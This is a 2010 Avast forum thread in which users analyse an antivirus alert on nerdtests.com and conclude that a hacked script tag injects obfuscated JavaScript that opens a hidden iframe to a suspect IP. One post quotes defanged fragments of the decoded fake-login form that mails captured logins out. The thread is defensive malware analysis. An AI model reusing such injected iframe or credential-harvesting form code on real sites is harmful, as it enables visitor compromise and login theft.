Avast WEBforum

Other => Viruses and worms => Topic started by: Ruuga on July 07, 2010, 09:17:17 PM

Title: Nerdtests and Avast: Probably F/P?
Post by: Ruuga on July 07, 2010, 09:17:17 PM

So today I tried to open this site but avast thinks there is a trojan. I'm using the Avast 5 but I didn't get the alarm when I was using version 4. Also Avast sends an alarm if you type the URL to the google. Also my friend said that he got an alert with Avast 5.

Title: Re: Nerdtests and Avast: Probably F/P?
Post by: Pondus on July 07, 2010, 09:34:51 PM

VirusTotal - nerdtests.com.htm - 4/41
http://www.virustotal.com/analisis/cfeaba2eb3758ea4391bf7d660c46988b158ff2e4d55fa98adf6122fdc4cf4d5-1278531118

This page seems to be <suspicious>  1 suspicious inline script found.
http://www.UnmaskParasites.com/security-report/?page=www.nerdtests.com

NoVirusThanks - 3/16 - INFECTED
http://scanner.novirusthanks.org/analysis/8f4cbf447ed17e0c695a7846d4c1cc68/aW5kZXg=/

Wepawet
http://wepawet.cs.ucsb.edu/view.php?hash=a87ad2e60b4d1f2e09c65aea9d65e5ab&t=1278531513&type=js

Title: Re: Nerdtests and Avast: Probably F/P?
Post by: DavidR on July 07, 2010, 10:00:50 PM

There appears to be one of the google script tags which has been hacked (2nd to last on the page code, see image1), inserting a long line of obfuscated javascript.

This script when decoded (image2) is creating a hidden iframe tag that tries to open an IP in the Ukraine and highly suspect.

So I believe that the detection is good.

Title: Re: Nerdtests and Avast: Probably F/P?
Post by: polonus on July 08, 2010, 12:02:10 AM

Hi DavidR,

And what does that long unescape string do? Well. that is hexadecimal coded javascript commands that are decoded according to lines as : <FORM METHOD="POST" ACTION="some address/form/mailto.cgi" ENCTYPE="x-wXw-form-urlencoded"> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="wXwmalcreant*com"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Some Login Hacked! (by OUR INC`s Fake Login)"> <INPUT TYPE="hidden" NAME="Next_Page" VALUE="hxtp/etc. etc. ">
Another interesting explanation of the exploit: http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_exploits_interesantes_actualizando-t141915.30.html

polonus

Title: Re: Nerdtests and Avast: Probably F/P?
Post by: DavidR on July 08, 2010, 02:19:59 AM

What it does is shown in the last image and what I said in the post (which seems to differs from your example), creates a hidden iframe and connects to an IP in the Ukraine. After that I don't care what it does, just that avast has in my mind done its job and blocked the insertion of an obfuscated script (JS:ScriptXE-inf [Trj])

Even if your explanation is right it is still a good detection by avast, I just don't go to any depth when I find what I consider is enough evidence to confirm a good detection.

Title: Re: Nerdtests and Avast: Probably F/P?
Post by: Lisandro on July 13, 2010, 03:17:32 AM

You've received a blog article.
Congratulations :)

http://blog.avast.com/2010/07/07/are-you-a-nerd/

Title: Re: Nerdtests and Avast: Probably F/P?
Post by: DavidR on July 13, 2010, 05:03:16 AM

Thanks for the notice Tech.

Yes, it is nice that the virus labs noticed it amongst all the other topics ;D